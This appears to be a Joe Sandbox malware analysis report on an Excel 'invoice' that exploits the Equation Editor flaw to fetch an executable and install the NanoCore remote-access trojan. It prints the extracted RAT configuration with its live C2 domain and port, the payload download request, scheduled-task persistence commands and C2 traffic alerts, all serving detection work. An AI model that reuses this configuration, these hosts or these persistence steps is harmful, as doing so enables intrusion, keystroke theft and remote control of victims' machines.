Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report INVOICE = 212888585 .xlsx

Overview

General Information

Sample Name:INVOICE = 212888585 .xlsx
Analysis ID:483709
MD5:145e00853b80fb2d97676c4416f984a9
SHA1:fa80c59ebbafc435e88ffdceae00450b56ec5d48
SHA256:e9c342550d334bffc58a310997673e24eed03f4d2b9c441dec943b24e7d29d08
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Binary contains a suspicious time stamp
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2584 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 832 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ALP.exe (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • ALP.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
        • schtasks.exe (PID: 2212 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2596 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2612 cmdline: taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • ALP.exe (PID: 2608 cmdline: C:\Users\user\AppData\Roaming\ALP.exe 0 MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • ALP.exe (PID: 2700 cmdline: C:\Users\user\AppData\Roaming\ALP.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 2668 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • smtpsvc.exe (PID: 1412 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
      • smtpsvc.exe (PID: 2196 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
  • smtpsvc.exe (PID: 2796 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 2192 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
    • smtpsvc.exe (PID: 344 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 60E9F1E8596C98A6B07129D9C24EC359)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "9ed8d108-2eb1-4e23-9679-783796e4", "Group": "Default", "Domain1": "godisgood1.hopto.org", "Domain2": "", "Port": 7712, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x4312d:$a: NanoCore
    • 0x43186:$a: NanoCore
    • 0x431c3:$a: NanoCore
    • 0x4323c:$a: NanoCore
    • 0x568e7:$a: NanoCore
    • 0x568fc:$a: NanoCore
    • 0x56931:$a: NanoCore
    • 0x6f8c3:$a: NanoCore
    • 0x6f8d8:$a: NanoCore
    • 0x6f90d:$a: NanoCore
    • 0x4318f:$b: ClientPlugin
    • 0x431cc:$b: ClientPlugin
    • 0x43aca:$b: ClientPlugin
    • 0x43ad7:$b: ClientPlugin
    • 0x566a3:$b: ClientPlugin
    • 0x566be:$b: ClientPlugin
    • 0x566ee:$b: ClientPlugin
    • 0x56905:$b: ClientPlugin
    • 0x5693a:$b: ClientPlugin
    • 0x6f67f:$b: ClientPlugin
    • 0x6f69a:$b: ClientPlugin
    00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x350b:$x1: NanoCore.ClientPluginHost
    • 0x3525:$x2: IClientNetworkHost
    00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x350b:$x2: NanoCore.ClientPluginHost
    • 0x52b6:$s4: PipeCreated
    • 0x34f8:$s5: IClientLoggingHost
    00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 83 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      16.2.smtpsvc.exe.2564e04.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      16.2.smtpsvc.exe.2564e04.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      16.2.smtpsvc.exe.358b34e.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0x145e3:$x1: NanoCore.ClientPluginHost
      • 0x2d5bf:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      • 0x14610:$x2: IClientNetworkHost
      • 0x2d5ec:$x2: IClientNetworkHost
      16.2.smtpsvc.exe.358b34e.4.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x145e3:$x2: NanoCore.ClientPluginHost
      • 0x2d5bf:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0x156be:$s4: PipeCreated
      • 0x2e69a:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      • 0x145fd:$s5: IClientLoggingHost
      • 0x2d5d9:$s5: IClientLoggingHost
      16.2.smtpsvc.exe.358b34e.4.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 191 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1212, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Exploits:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 136.144.41.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 832, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 832, TargetFilename: C:\Users\user\AppData\Roaming\ALP.exe

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1212, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ALP.exe, CommandLine: C:\Users\user\AppData\Roaming\ALP.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ALP.exe, NewProcessName: C:\Users\user\AppData\Roaming\ALP.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ALP.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 832, ProcessCommandLine: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1272

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1212, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ALP.exe, ProcessId: 1212, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9ed8d108-2eb1-4e23-9679-783796e4", "Group": "Default", "Domain1": "godisgood1.hopto.org", "Domain2": "", "Port": 7712, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: INVOICE = 212888585 .xlsxVirustotal: Detection: 42%Perma Link
        Source: INVOICE = 212888585 .xlsxReversingLabs: Detection: 50%
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeReversingLabs: Detection: 30%
        Source: C:\Users\user\AppData\Roaming\ALP.exeReversingLabs: Detection: 30%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR
        Machine Learning detection for sampleShow sources
        Source: INVOICE = 212888585 .xlsxJoe Sandbox ML: detected
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\ALP.exeJoe Sandbox ML: detected
        Source: 4.2.ALP.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 17.2.smtpsvc.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 4.2.ALP.exe.6c0000.3.unpackAvira: Label: TR/NanoCore.fadte
        Source: 16.2.smtpsvc.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 14.2.ALP.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: global trafficDNS query: name: godisgood1.hopto.org
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.41.96:80

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.147.184.84:7712
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.147.184.84:7712
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: godisgood1.hopto.org
        Source: Malware configuration extractorURLs:
        Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
        Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
        Source: global trafficHTTP traffic detected: GET /HHK.exe HTTP/1.1Connection: Keep-AliveHost: 136.144.41.96
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:57:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 03:07:30 GMTETag: "93400-5cbffffb6965c"Accept-Ranges: bytesContent-Length: 603136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 98 60 4b 8c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2a 09 00 00 08 00 00 00 00 00 00 ba 48 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 